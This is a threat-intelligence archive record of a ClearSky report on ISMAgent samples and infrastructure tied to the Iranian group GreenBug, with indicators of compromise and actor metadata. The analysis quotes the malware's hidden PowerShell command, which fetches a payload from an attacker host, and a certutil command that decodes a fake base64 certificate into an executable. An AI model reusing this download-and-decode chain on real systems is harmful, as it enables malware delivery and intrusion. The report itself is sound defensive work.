{
	"id": "b800719e-feef-4cd7-a2a9-d1a085a7df9b",
	"created_at": "2026-04-06T00:08:55.824709Z",
	"updated_at": "2026-04-10T13:12:36.73813Z",
	"deleted_at": null,
	"sha1_hash": "7661eee9ccae41d315b9634587ad0776e57382dd",
	"title": "Recent ISMAgent Samples and Infrastructure by Iranian Threat Group GreenBug – ClearSky Cyber Security",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 59528,
	"plain_text": "Recent ISMAgent Samples and Infrastructure by Iranian Threat\r\nGroup GreenBug – ClearSky Cyber Security\r\nPublished: 2017-08-28 · Archived: 2026-04-05 21:43:31 UTC\r\nRecently we detected new samples and Infrastructure of ISMAgent,  a trojan in use by Iranian Threat Group\r\nGreenBug. Interestingly, as part of the delivery mechanism, the malware is disguised as a base64 digital certificate\r\nand decoded via certutil.exe. This post describes the new campaign.\r\nchange managment.dot\r\nSample change managment.dot (812d3c4fddf9bb81d507397345a29bb0) exploits CVE-2017-0199 and calls the\r\nfollowing URL:\r\nhttp://www.msoffice-cdn[.]com/updatecdnsrv/prelocated/owa/auth/template.rtf\r\nwhich in turn runs this command:\r\n“C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe” -nologo -WindowStyle Hidden $webClient =\r\nNew-Object http://System.Net .WebClient; $val = $webClient.DownloadString(‘https://a.pomf[.]cat/ntluca.txt ‘);\r\nadd-content -path ‘C:\\Users\\USER\\AppData\\Roaming/srvRep.txt’ -value $val -force\r\nhttp://www.clearskysec.com/ismagent/\r\nPage 1 of 3\n\nThe command downloads ntluca.txt from http://a.pomf[.]cat/ntluca.txt.\r\nDisguised as  a base64 digital certificate, the file actually decodes to an ISMagent sample\r\n(96b47c5af8652ac99150bf602a88498b) via the following command:\r\nC:\\Windows\\System32\\certutil.exe” -decode C:\\Users\\USER\\AppData\\Roaming\\srvRep.txt\r\nC:\\Users\\USER\\AppData\\Roaming\\srvConhost.exe\r\nIndicators of compromise\r\nIndicators of compromise are presented below and are available on PassiveTotal.\r\nDomain cdnmsnupdate[.]com\r\nDomain msoffice-cdn[.]com\r\nURL http://74.91.19[.]122/action2/\r\nURL http://82.102.14[.]246/webdav/aws.exe\r\nURL http://www.msoffice-cdn[.]com/updatecdnsrv/prelocated/owa/auth/template.rtf\r\nURL http://a.pomf[.]cat/ntluca.txt\r\nIP 185.162.235.121\r\nIP 82.102.14.246\r\nIP 74.91.19.122\r\nHash 6d2f8a06534e2ebebc43295fb266a8ca\r\nHash 812d3c4fddf9bb81d507397345a29bb0\r\nHash 3d497c4711c0226d86a693a40891f9a1\r\nHash 96b47c5af8652ac99150bf602a88498b\r\nhttp://www.clearskysec.com/ismagent/\r\nPage 2 of 3\n\nHash 66eaef10226fb279dba64bb5948bc85b\r\nHash 7d83715a9a6aabcbc621cc786de0c9ea\r\nHash 15d9d184b71d243ae5c005c68a045889\r\nwhoisName Neslihan Ozcivit\r\nwhoisEmail neslihan.ozcivit@mail.ru\r\nFilename aws.exe\r\nFilename Crypted.exe\r\nFilename document-gerenated-problem.exe\r\nFilename PolicyConverter.exe\r\nThe Maltego graph below depicts the relationship among the indicators (click to enlarge):\r\nSource: http://www.clearskysec.com/ismagent/\r\nhttp://www.clearskysec.com/ismagent/\r\nPage 3 of 3",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA"
	],
	"origins": [
		"web"
	],
	"references": [
		"http://www.clearskysec.com/ismagent/"
	],
	"report_names": [
		"ismagent"
	],
	"threat_actors": [
		{
			"id": "e58deb93-aff1-4be5-8deb-37fe8af0b7ed",
			"created_at": "2022-10-25T16:07:23.918534Z",
			"updated_at": "2026-04-10T02:00:04.789509Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [
				"Greenbug",
				"Volatile Kitten"
			],
			"source_name": "ETDA:Greenbug",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "25896473-161f-411f-b76a-f11bb26c96bd",
			"created_at": "2023-01-06T13:46:38.75749Z",
			"updated_at": "2026-04-10T02:00:03.090307Z",
			"deleted_at": null,
			"main_name": "CHRYSENE",
			"aliases": [
				"Greenbug"
			],
			"source_name": "MISPGALAXY:CHRYSENE",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "6bba8e81-73af-4010-86dc-d43c408ca342",
			"created_at": "2023-01-06T13:46:38.553459Z",
			"updated_at": "2026-04-10T02:00:03.021597Z",
			"deleted_at": null,
			"main_name": "Greenbug",
			"aliases": [],
			"source_name": "MISPGALAXY:Greenbug",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434135,
	"ts_updated_at": 1775826756,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7661eee9ccae41d315b9634587ad0776e57382dd.pdf",
		"text": "https://archive.orkl.eu/7661eee9ccae41d315b9634587ad0776e57382dd.txt",
		"img": "https://archive.orkl.eu/7661eee9ccae41d315b9634587ad0776e57382dd.jpg"
	}
}